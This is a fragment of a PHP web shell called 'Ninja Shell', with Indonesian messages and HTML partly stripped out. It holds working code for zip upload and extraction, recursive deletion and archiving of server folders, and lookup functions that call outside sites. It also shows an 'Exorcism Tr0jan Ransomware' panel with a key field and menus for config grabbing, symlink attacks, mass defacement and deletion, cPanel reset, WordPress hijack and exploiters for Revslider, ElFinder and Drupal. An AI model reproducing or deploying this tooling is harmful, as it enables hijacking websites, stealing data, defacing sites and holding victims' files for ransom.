"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ('.' === $file || '..' === $file) continue; if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if ($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if (!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__) . '/'; $filenoext = basename($filename, '.zip'); $filenoext = basename($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive($targetdir); mkdir($targetdir, 0777); if (move_uploaded_file($source, $targetzip)) { $zip = newZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "Sukses Cok :)"; } else { $message = "Error Jancok :("; } } echo 'Zip File :

'; if ($message) echo "

$message

"; echo "

Zip Backup

Folder:

Save To:

"; if ($_POST['backup']) { $save = $_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'], $save); echo "Selesai , Save To $save"; } echo "

Unzip Manual

Zip Location:

Save To:

"; if ($_POST['extrak']) { $save = $_POST['save']; $zip = new ZipArchive; $res = $zip->open($_POST['dir']); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo 'Succes , Location : ' . $save . ''; } else { echo 'Gagal Cok :( Ntahlah !'; } } echo '

'; } elseif (isset($_GET[hex('reverse-ip')])) { ?>

Reverse IP Ninja Shell

[ Reverse IP Lookup ]

')) { echo '

Tools Ransomware Ini Hanya bisa berjalan di PHP versi 7.2 ke bawah saja . untuk PHP versi 7.2 ke atas masih proses pembuatan '; exit; } ?>

ҳ̸Ҳ̸ҳ Exorcism Tr0jan Ransomware ҳ̸Ҳ̸ҳ


  ______                         _                  _______      ___   _                 _____                                                                
 |  ____|                       (_)                |__   __|    / _ \ (_)               |  __ \                                                               
 | |__   __  __ ___   _ __  ___  _  ___  _ __ ___     | | _ __ | | | | _   __ _  _ __   | |__) | __ _  _ __   ___   ___   _ __ ___ __      __ __ _  _ __  ___ 
 |  __|  \ \/ // _ \ | '__|/ __|| |/ __|| '_ ` _ \    | || '__|| | | || | / _` || '_ \  |  _  / / _` || '_ \ / __| / _ \ | '_ ` _ \\ \ /\ / // _` || '__|/ _ \
 | |____  >  <| (_) || |  | (__ | |\__ \| | | | |     | || |   | |_| || || (_| || | | | | | \ \| (_| || | | |\__ \| (_) || | | | | |\ V  V /| (_| || |  |  __/
 |______|/_/\_\\___/ |_|   \___||_||___/|_| |_| |_|   |_||_|    \___/ | | \__,_||_| |_| |_|  \_\\__,_||_| |_||___/ \___/ |_| |_| |_| \_/\_/  \__,_||_|   \___|
                                                                      / |                                                                                     
                                                                    |__/                                                                                      

               .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
         )b.  .dbo.dP'`v'`9b.odb.  .dX(
       ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
      dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
      dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
      9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
       `'      9XXXXXX(   )XXXXXXP      `'
	XXXX X.`v'.X XXXX
         XP^X'`b   d'`X^XX
         X. 9  `   '  P )X
         `b  `       '  d'
         `             '
		 
	 
 -[ Contact : Exorcism404@hackermail.com ]-
 
 System :  
 Server : 
 #Ransomware Ini Berada Pada [dir]: /

Put Your Encryption/Decryption Key Here

', ''); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("http://networktools.nl/asinfo/$site"); $ip = @findit($getip, '

', '

'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("http://networktools.nl/reverseip/$site"); $ip = @findit($getip, '

', '

'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains"); $ip = @findit($getip, 'Nameservers found:', '

Not Found

Mass Tools Ninja Shell

Symlink Ninja Shell

Symlink Ninja Shell

Symlink2 Ninja Shell

Config Grabber Ninja Shell

Netsploit Ninja Shell

CGI Ninja Shell

$n Kali Anda Telah Ngecrot Disini

$key Kali Anda Telah Ngecrot Disini

Mass Deface / Delete Files Ninja Shell

Mass User Changer Ninja Shell

Mass Title Changer Ninja Shell

Bypasser Ninja Shell

Bypass CloudFlare Ninja Shell

Bypass Server Ninja Shell

Bypass Etc/Passwd

Bypass User

Exploiter Ninja Shell

CSRF Exploiter Ninja Shell

Upload Your Files

Revslider Exploiter Ninja Shell

ElFinder Mass Exploiter

Drupal Mass Exploiter

Auto Tools Ninja Shell

Zone H Submit Ninja Shell

Defacer ID Submit Ninja Shell

Jumping Ninja Shell

Fake Root Ninja Shell

Adminer Ninja Shell

RDP Ninja Shell

Wordpress Hijack Index Ninja Shell

Cpanel Reset Ninja Shell

Zip Menu

Zip Backup

Unzip Manual

Reverse IP Ninja Shell

Put Your Encryption/Decryption Key Here

Post Type :